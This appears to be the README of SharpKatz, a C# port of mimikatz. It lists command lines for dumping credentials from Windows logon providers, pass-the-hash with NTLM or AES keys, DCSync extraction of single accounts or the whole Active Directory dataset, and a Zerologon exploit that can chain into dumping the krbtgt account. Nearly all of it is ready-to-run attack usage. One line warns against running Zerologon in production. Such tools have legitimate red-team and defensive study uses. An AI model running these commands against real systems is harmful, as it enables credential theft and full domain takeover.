Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
SharpKatz.exe --Command ekeys
list Kerberos encryption keys
SharpKatz.exe --Command msv
Retrive user credentials from Msv provider
SharpKatz.exe --Command kerberos
Retrive user credentials from Kerberos provider
SharpKatz.exe --Command tspkg
Retrive user credentials from Tspkg provider
SharpKatz.exe --Command credman
Retrive user credentials from Credman provider
SharpKatz.exe --Command wdigest
Retrive user credentials from WDigest provider
SharpKatz.exe --Command logonpasswords
Retrive user credentials from all providers
SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash
Perform pth to create a process under userdomain\username credential with ntlm hash of the user's password
SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key
Perform pth to create a process under userdomain\username credential user's rc4 key
SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash
Replace ntlm hash for an existing logonsession
SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes256 aes256
Perform pth to create a process under userdomain\username credential with ntlm hash of the user's password and aes256 key
SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc
Dump user credential by username
SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc
Dump user credential by GUID
SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc
Export the entire dataset from AD to a file created in the current user's temp forder
SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
Dump user credential by username using alternative credentials
SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
Dump user credential by GUID using alternative credentials
SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
Export the entire dataset from AD to a file created in the current user's temp forder using alternative credentials
No reference to logoncli.dll, using the direct rpc call works even from a non-domain joined workstation
SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Perform Zerologon check
SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Perform Zerologon attack
SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local
Perform Zerologon attack and dump user credential by username
SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --Guid guid --DomainController WIN-NSE5CPCP07C.testlab2.local
Perform Zerologon attack and dump user credential by GUID
SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --DomainController WIN-NSE5CPCP07C.testlab2.local
Perform Zerologon attack and export the entire dataset from AD to a file created in the current user's temp forder
Note: Do not use zerologon in a production environment or at least plan for recovery actions which are detailed here
This project depends entirely on the work of Benjamin Delpy and Vincent Le Toux on Mimikatz and MakeMeEnterpriseAdmin projects.
The analysis of the code was conducted following the example from this blog post by xpn.